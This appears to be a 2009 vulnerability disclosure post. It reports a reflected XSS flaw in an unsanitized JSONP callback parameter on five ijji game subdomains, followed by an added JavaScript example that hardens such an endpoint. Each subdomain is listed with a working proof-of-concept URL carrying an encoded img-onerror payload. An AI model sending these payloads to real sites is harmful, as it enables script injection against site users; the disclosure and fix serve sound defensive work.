JSON Last Login Callback [BONUS]

29 July 2009

Type: Non-persistent
Criteria: None

This post discloses 5 different subdomains that all use the lastlogin.nhn script to return the last login time for each game. All of them follow the same pattern of an unsanitized callback parameter, as seen in many other posts.

Gunz

http://gunz.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Soldier Front

http://sfront.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Lunia

http://lunia.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Drift City

http://drift.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

IJJI’s license for Gunbound expired on July 23rd 2009 (source), but that service was also vulnerable.

Gunbound

http://gunbound.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--
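As an added example (not ijji's own lastlogin.nhn code), this is how a JSONP endpoint of this kind can be hardened: the callback name is validated against a strict identifier pattern before it is reflected, and the response is declared as script with content sniffing disabled. The function names and the response shape are assumptions.

```javascript
// Added example (not ijji's lastlogin.nhn code): a JSONP endpoint that
// validates the callback name before reflecting it into the response.
// buildJsonpResponse and its return shape are hypothetical.

// A JSONP callback should be a plain JS identifier path such as
// "showLastLogin" or "app.handlers.lastLogin"; nothing else is reflected.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LENGTH = 64;

function isSafeCallbackName(name) {
  return typeof name === "string"
    && name.length > 0
    && name.length <= MAX_CALLBACK_LENGTH
    && CALLBACK_RE.test(name);
}

// Serialise the data as JSON, escaping U+2028/U+2029, which are valid inside
// JSON strings but were line terminators in JavaScript source at the time.
function toJsLiteral(value) {
  return JSON.stringify(value)
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Returns { status, headers, body } describing the HTTP response.
function buildJsonpResponse(callback, payload) {
  if (!isSafeCallbackName(callback)) {
    // Reject rather than "clean up": attacker-controlled markup is never echoed.
    return {
      status: 400,
      headers: { "Content-Type": "text/plain; charset=utf-8" },
      body: "invalid callback",
    };
  }
  return {
    status: 200,
    headers: {
      // Declaring the body as script and forbidding sniffing stops a browser
      // from rendering the response as HTML when the URL is opened directly.
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    // The leading comment keeps the body from being mistaken for another format.
    body: "/**/" + callback + "(" + toJsLiteral(payload) + ");",
  };
}
```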
